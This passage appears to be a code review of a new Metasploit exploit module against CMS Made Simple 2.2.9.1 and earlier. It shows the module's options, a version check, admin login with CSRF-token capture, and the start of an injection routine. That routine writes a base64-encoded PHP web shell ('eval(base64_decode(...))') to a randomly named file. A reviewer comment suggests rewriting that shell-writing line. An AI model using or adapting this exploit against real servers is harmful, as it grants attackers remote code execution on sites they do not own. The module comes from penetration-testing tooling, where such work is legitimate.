modules/exploits/multi/http/cmsms_object_injection_rce.rb

```diff
@@ -0,0 +1,162 @@
+        ['URL', 'https://www.cmsmadesimple.org/2019/03/Announcing-CMS-Made-Simple-v2.2.10-Spuzzum']
+      ],
+      'Privileged' => false,
+      'Platform' => ['php'],
+      'Arch' => [ARCH_PHP],
+      'Targets' => [['Automatic', {}]],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Mar 26 2019'))
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base cmsms directory path', '/']),
+        OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
+        OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
+      ]
+    )
+    @csrf = nil
+    @cookies = nil
+    @csrf_name = nil
+  end
+
+  def multipart_form_data(uri, data, message)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin', uri),
+      'method' => 'POST',
+      'data' => data,
+      'ctype' => "multipart/form-data; boundary=#{message.bound}",
+      'cookie' => @cookies
+    )
+  end
+
+  def post(uri, data)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin', uri),
+      'method' => 'POST',
+      'vars_post' => data,
+      'cookie' => @cookies
+    )
+  end
+
+  def get(path, filename)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, path, filename),
+      'method' => 'GET'
+    )
+  end
+
+  def check
+    res = get('', 'index.php')
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.body.match?(/CMS Made Simple/i)
+      return CheckCode::Safe
+    end
+
+    version = Gem::Version.new(res.body.scan(/CMS Made Simple<\/a> version (\d+\.\d+\.\d+)/).flatten.first)
+    vprint_status("#{peer} - CMS Made Simple Version: #{version}")
+
+    if version <= Gem::Version.new('2.2.9.1')
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def login
+    data = {
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'loginsubmit' => 'Submit'
+    }
+    res = post('login.php', data)
+
+    unless res
+      fail_with(Failure::NotFound,
+        'A response was not received from the remote host')
+    end
+
+    unless res.code == 302 && res.get_cookies && res.headers['Location'] =~ %r{\/admin\?(.*)?=(.*)}
+      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+    end
+    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+    vprint_good("#{peer} - Authentication successful")
+    @csrf_name = Regexp.last_match(1)
+    csrf_val = Regexp.last_match(2)
+    @csrf = { @csrf_name => csrf_val }
+    @cookies = res.get_cookies
+  end
+
+  def send_injection
+    # prepare shell command
+    shell_name = rand_text_alpha(8..12) + '.php'
+    cmd = Rex::Text.encode_base64(payload.encoded).delete('\n', '')
+    cmd = "echo \"<?php eval(base64_decode('" + cmd + "')); ?>\" > " + shell_name
```

Comment:
Using double quotes (`"`) permits interpolation.

```suggestion
    cmd = "echo \"<?php eval(base64_decode('#{cmd}')); ?>\" > #{shell_name}"
```